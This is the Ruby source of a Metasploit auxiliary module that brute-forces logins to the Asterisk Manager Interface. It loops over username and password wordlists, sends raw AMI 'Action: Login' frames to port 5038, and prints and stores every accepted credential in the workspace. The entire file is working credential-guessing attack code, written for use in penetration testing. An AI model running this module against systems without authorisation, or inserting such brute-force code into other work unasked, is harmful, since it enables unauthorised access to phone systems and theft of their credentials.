Path: blob/master/modules/auxiliary/voip/asterisk_login.rb
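##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner that tries username/password pairs against the Asterisk
# Manager Interface (AMI) and records any pair the service accepts.
#
# Every attempt opens a fresh connection, reads whatever the service sends
# first, checks it for the "Asterisk Call Manager" banner, sends a single
# `Action: Login` frame and closes the connection again. On the wire (and in
# the service's own logs, if it records logins) a run therefore shows up as
# many short-lived connections to the manager port from one source.
#
# The login frame is sent exactly as built in #do_login, with the Username and
# Secret values in clear text inside it; nothing in this module adds transport
# encryption.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute

  # Registers the module metadata and its options.
  #
  # RPORT defaults to 5038; USER_FILE and PASS_FILE default to the
  # unix_users.txt and unix_passwords.txt wordlists under the install root.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Asterisk Manager Login Utility',
      'Description' => %q{
        This module attempts to authenticate to an Asterisk Manager service. Please note
        that by default, Asterisk Call Management (port 5038) only listens locally, but
        this can be manually configured in file /etc/asterisk/manager.conf by the admin
        on the victim machine.
      },
      'Author' =>
        [
          'dflah_ <dflah[at]alligatorteam.org>',
        ],
      'References' =>
        [
          ['URL', 'http://www.asterisk.org/astdocs/node201.html'], # Docs for AMI
        ],
      'License' => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(5038),
        OptString.new('USER_FILE',
          [
            false,
            'The file that contains a list of probable users accounts.',
            File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_users.txt')
          ]),

        OptString.new('PASS_FILE',
          [
            false,
            'The file that contains a list of probable passwords.',
            File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
          ])
      ])
  end

  # Records an accepted login through create_credential and
  # create_credential_login.
  #
  # NOTE: the password is stored as given (private_type :password), so the
  # workspace this writes to ends up holding the recovered secret.
  #
  # @param opts [Hash] :ip, :port, :user, :password and :proof of the accepted login
  # @return the value returned by create_credential_login
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: 'asterisk_manager',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: DateTime.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Runs the credential loop for one host by handing every user/password pair
  # from each_user_pass to #do_login.
  #
  # @param ip [String] the host being scanned (not read here; the body uses
  #   rhost/rport)
  def run_host(ip)
    print_status("Initializing module...")
    begin
      each_user_pass do |user, pass|
        do_login(user, pass)
      end
    rescue ::Rex::ConnectionError
      # Connection-level failures end the run for this host without a message.
    rescue ::StandardError => e
      # StandardError rather than Exception: interrupts and exit requests must
      # reach the caller instead of being logged and dropped here.
      vprint_error("#{rhost}:#{rport} #{e} #{e.backtrace}")
    end
  end

  # Sends one command on the manager connection and keeps the reply in @result.
  #
  # Connects first when @connected is false. @result is reset to '' before
  # anything else, so it is '' whenever the exchange fails part-way.
  #
  # @param command [String, nil] raw AMI text to write; #do_login passes nil
  #   for its connect-only call
  # @return [String] the reply, or the value of print_error after a failure
  def send_manager(command = '')
    @result = ''
    unless @connected
      connect
      @connected = true
      # select with no descriptors is just a 0.4 s pause after connecting.
      select(nil, nil, nil, 0.4)
    end
    sock.put(command)
    @result = sock.get_once || ''
  rescue ::StandardError => err
    # Errors are reported and swallowed on purpose: the caller only looks at
    # @result. Interrupts and exit requests are no longer caught here.
    print_error("Error: #{err}")
  end

  # Tries one username/password pair over a fresh connection.
  #
  # The connection is closed in the ensure clause, so it is released on every
  # exit, including the :abort return and the rescued errors, which previously
  # left it open.
  #
  # @param user [String] username placed in the Login action
  # @param pass [String] password placed in the Secret field
  # @return [Symbol, nil] :abort when the banner is missing, :next_user when
  #   the login is accepted, :fail when it is rejected, nil after a rescued
  #   connection error
  def do_login(user = '', pass = '')
    @connected = false
    send_manager(nil) # connect only

    if @result !~ /^Asterisk Call Manager(.*)/
      print_error("Asterisk Manager does not appear to be running")
      return :abort
    end

    vprint_status("#{rhost}:#{rport} - Trying user:'#{user}' with password:'#{pass}'")
    cmd = "Action: Login\r\nUsername: #{user}\r\nSecret: #{pass}\r\n\r\n"
    send_manager(cmd)
    return :fail unless /Response: Success/.match(@result)

    # The accepted password is printed in clear and @result is kept as proof.
    print_good("User: \"#{user}\" using pass: \"#{pass}\" - can login on #{rhost}:#{rport}!")
    report_cred(ip: rhost, port: rport, user: user, password: pass, proof: @result)
    :next_user
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout,
         ::Timeout::Error, ::Errno::EPIPE
    nil
  ensure
    # NOTE(review): assumes disconnect tolerates a socket that never opened
    # or is already closed; confirm against the Tcp mixin.
    disconnect
  end
end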